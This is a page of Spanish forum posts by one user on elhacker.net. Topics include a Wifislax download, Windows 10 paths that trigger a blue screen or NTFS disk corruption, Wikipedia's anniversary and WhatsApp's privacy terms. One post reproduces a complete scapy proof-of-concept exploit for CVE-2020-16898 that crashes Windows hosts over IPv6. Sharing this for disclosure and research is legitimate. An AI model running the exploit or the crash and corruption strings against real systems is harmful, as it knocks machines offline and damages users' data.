     Se veían imperfecciones en la parte baja
     si usábamos un monitor grande.

Descarga
https://ns2.elhacker.net/isos/wifislax64-2.4-final.iso

Fuente:
https://foro.seguridadwireless.net/live-wifislax/wifislax64-2-4-final-para-descarga
57  Seguridad Informática / Bugs y Exploits / Ruta en Windows 10 provoca pantalla azul de la muerte BSOD en: 19 Enero 2021, 23:28 pm
Si escribes esto en la barra de direcciones del navegador:

Citar
\\.\globalroot\device\condrv\kernelconnect

O si guardas la ruta en un fichero .URL obtienes una bonita pantalla azul de a muerte de Windows 10

Pero según elmundo[].es -> "estropea tu ordenador para siempre"  Gizmodo -> "puede arruinar por completo tu PC" elConfidencial  -> "puede bloquear tu Windows 10 para siempre". Titulares sensacionalistas. Información completamente falsa. Reinicias Windows y sin problemas.

Y pero aún error en NTFS:

 Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo

Código:
c:\:$i30:bitmap

Ambos descubiertos por https://twitter.com/jonasLyk

Ejemplos:
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html
58  Foros Generales / Noticias / La WikiPedia cumple hoy 20 años en: 15 Enero 2021, 19:36 pm
Hoy Wikipedia celebra su 20 cumpleaños.

Se erige como un brillante ejemplo de #WebWeWant: un espacio abierto y colaborativo que brinda acceso gratuito al conocimiento en todo el mundo.

Wikipedia, que fue abierta por primera vez hace 20 años el 15 de enero del años 2001.



 El 15 de enero de 2001 el empresario Jimmy Wales y el filósofo Larry Sanger, ambos estadounidenses, crearon Wikipedia, una enciclopedia libre, escrita y editada por voluntarios y publicada en internet, que nació para sumar conocimiento y con la convicción de que este es propiedad de todas las personas del mundo.

https://wikimediafoundation.org/es/wikipedia20/
59  Foros Generales / Noticias / WhatsApp borrará nuestra cuenta si no aceptamos que comparta nuestros datos con Facebook en: 7 Enero 2021, 19:48 pm
WhatsApp actualiza su Política de privacidad y Términos de servicio, haciendo que el intercambio de datos con Facebook sea obligatorio para todos. IMPORTANTE: debes aceptarlo antes del 8 de febrero; de lo contrario, tu cuenta será BORRADA.

https://faq.whatsapp.com/general/security-and-privacy/how-we-work-with-the-facebook-companies?eea=1

Los usuarios de WhatsApp que no estén de acuerdo con sus términos revisados antes del 8 de febrero tendrán sus cuentas inaccesibles, WhatsApp eventualmente terminará eliminando las cuentas después de 120 días de inactividad.



¿Si soy ciudadano de la Unión Europea?

Las condiciones para los ciudadanos de la UE son algo distintas ya que, sus condiciones de uso para la Unión Europea son distintas y recogen lo siguiente:

La principal diferencia reside en que, gracias al Reglamento General de Protección de Datos, los ciudadanos de la UE recibimos servicio de WhatsApp Ireland Limited y no de WhatsApp LLC.

Fuente:
https://derechodelared.com/whatsapp-cambios-privacidad-usuarios/
60  Seguridad Informática / Bugs y Exploits / PoC Proof-of-Concept - Ping de la Muerte | BSOD exploit for CVE-2020-16898 | Windows TCP/IPv6 en: 5 Enero 2021, 01:16 am
Código
  1. #!/usr/bin/env python3
  2. #
  3. # Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
  4. #
  5. # Author: Adam 'pi3' Zabrocki
  6. # http://pi3.com.pl
  7. #
  8.  
  9. from scapy.all import *
  10.  
  11. v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
  12. v6_src = "fe80::24f5:a2ff:fe30:8890"
  13.  
  14. p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
  15. p_test = p_test_half + 'A'.encode()*4
  16.  
  17. c = ICMPv6NDOptEFA();
  18.  
  19. e = ICMPv6NDOptRDNSS()
  20. e.len = 21
  21. e.dns = [
  22. "AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
  23. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  24. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  25. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  26. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  27. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  28. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  29. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  30. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
  31. "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
  32.  
  33. pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
  34.      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
  35.  
  36. p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
  37.              IPv6ExtHdrFragment()/pkt
  38.  
  39. l=fragment6(p_test_frag, 200)
  40.  
  41. for p in l:
  42.    send(p)
  43.  
  44.  

Vaya, es repetido, ya lo puse en:

https://foro.elhacker.net/bugs_y_exploits/ping_de_la_muerte_para_windows_10_ipv6-t507320.0.html
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 ... 36
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines